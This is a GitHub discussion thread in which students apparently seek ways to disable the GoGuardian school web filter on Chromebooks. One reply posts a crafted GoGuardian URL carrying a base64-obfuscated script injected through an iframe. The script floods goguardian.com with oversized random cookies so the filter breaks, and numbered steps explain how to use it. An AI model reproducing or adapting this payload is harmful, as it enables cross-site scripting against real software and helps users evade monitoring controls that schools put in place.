### DISCUSSION TITLE
My chromebook restarts whenever I try to Flood Freeze Goguardian

### DISCUSSION THREAD

**Discussion by sunyeetu** [3kh0/ext-remover#1211] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE]
whenever I try to floodfreze Goguardian my chrome always unexpectedly restarts, do I need to use more tabs? This just started happening to me on the latest chrome OS update

**Comment by sunyeetu** [comment]
also whenever I try to freeze Goguardian in other methods it restarts too

**Comment by akabutnicer** [comment]
Just use GoGuardian Fever?

Also, excuse the absurdly cringe name. I TOTALLY didn't make it.

**Reply by sunyeetu** [reply]
What method is that? (the github page is fully blocked for me)

**Reply by S-PScripts** [reply]
Disable GoGuardian with an error screen!

Link:
https://student.goguardian.com/teacher/blocked.html?cs=[{"name": ""}, {"name": "<iframe srcdoc=\"<script>top.eval(atob(`Zm9yKGxldCBpID0gMDsgaSA8IDEwMDsgaSsrKSB7CiAgZG9jdW1lbnQuY29va2llID0gYHgke2l9PSR7ZW5jb2RlVVJJQ29tcG9uZW50KGJ0b2EoY3J5cHRvLmdldFJhbmRvbVZhbHVlcyhuZXcgVWludDhBcnJheSgyNSAqIDI1KSkpKX07ZXhwaXJlcz0ke25ldyBEYXRlKDJlMTQpLnRvVVRDU3RyaW5nKCl9O2RvbWFpbj1nb2d1YXJkaWFuLmNvbTtwYXRoPS9gOwp9`))</script>\"></iframe>"}]

Instructions:
1. Copy the link above.
2. Go to a new tab and open the link above up.
3. The tab should be white with nothing on it. Reload.
4. If the GET request fails and you are left on an error screen, continue.
5. Visit chrome://restart to clear cached sites from GoGuardian.

How to undo:
1. On https://goguardian.com, press the lock icon at the top left of the screen.
2. Press cookies and site data.
3. Click manage cookies.
4. Clear each site's cookies you see there.

Credits:
akabutnice
https://github.com/3kh0/ext-remover

**Reply by akabutnicer** [reply]
> https://github.com/S-PScripts/chromebook-utilities/blob/main/Exploits/GoGuardian%20Fever

"(the GitHub page is fully blocked for me)"

**Reply by S-PScripts** [reply]
> > https://github.com/S-PScripts/chromebook-utilities/blob/main/Exploits/GoGuardian%20Fever
> 
> "(the GitHub page is fully blocked for me)"

OOPS

**Reply by must9f** [reply]
for goguardian fever it just says Hi, nothing to see here yet.

**Reply by akabutnicer** [reply]
yeah i presume they patched it

**Reply by S-PScripts** [reply]
well i guess there are many other goguardian exploits..

**Comment by S-PScripts** [comment]
ded
